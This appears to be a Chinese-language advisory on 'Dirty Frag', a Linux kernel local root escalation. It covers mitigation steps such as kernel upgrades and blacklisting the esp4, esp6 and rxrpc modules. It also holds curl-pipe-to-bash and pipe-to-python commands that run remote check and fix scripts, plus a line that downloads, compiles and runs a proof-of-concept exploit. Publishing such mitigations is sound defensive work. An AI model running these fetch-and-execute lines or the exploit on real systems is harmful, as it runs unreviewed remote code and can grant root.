# Dirty Frag

## 为什么很严重

- 两个 Linux Kernel 漏洞组合拳，CVE-2026-43284 + CVE-2026-43500是一个 Linux 内核里的本地提权漏洞。本来只是一个普通低权限用户（甚至容器里的普通用户），利用这个漏洞后，可能直接变成宿主机的 root。

- 这个漏洞从2017年开始就存在了，几乎所有主流 Linux 发行版都受影响。本质上是 Linux 内核在处理 esp4/esp6 和 rxrpc 数据时，错误地把本应只读的 page cache 当成可写缓冲区，导致普通用户可以精确覆盖受保护文件内容，最终通过篡改 SUID 程序实现本地提权到 root。

## 解决方法

### 方法一：升级内核
- 升级到官方修复版本，以及各大发行版回补的安全版本。

### 方法二：禁用相关模块

- 禁止加载esp4、esp6、rxrpc（可能会影响VPN等应用）

<CodePreview
  title="disable_mod"
  language="bash"
  code={`sudo sh -c 'printf "install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n" > /etc/modprobe.d/dirtyfrag.conf'`}
/>

- 把当前已经加载进内核的模块卸载掉

<CodePreview title="rmmod" language="bash" code={"sudo rmmod esp4 esp6 rxrpc 2>/dev/null"} />

- 清空缓存

<CodePreview title="drop_caches" language="bash" code={"sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'"} />



## 相关脚本

- 检查

<CodePreview title="check" language="bash" code={"curl https://ft-tutorial-center.21st-ai.com/sre/cve/dirtyfrag/check | python3.10"} />

- 修复（执行完毕后建议再次执行上面的命令重新检查一次）

<CodePreview title="fix" language="bash" code={"curl https://ft-tutorial-center.21st-ai.com/sre/cve/dirtyfrag/fix | bash"} />

- POC（恶意代码，仅限于自己测试验证！！！）

<CodePreview title="gcc" language="bash" code={"sudo apt update && sudo apt install gcc"} />

<CodePreview title="poc" language="bash" code={"wget https://ft-tutorial-center.21st-ai.com/sre/cve/dirtyfrag/exp.c -O exp.c && gcc -O0 -Wall -o exp exp.c -lutil && ./exp"} />

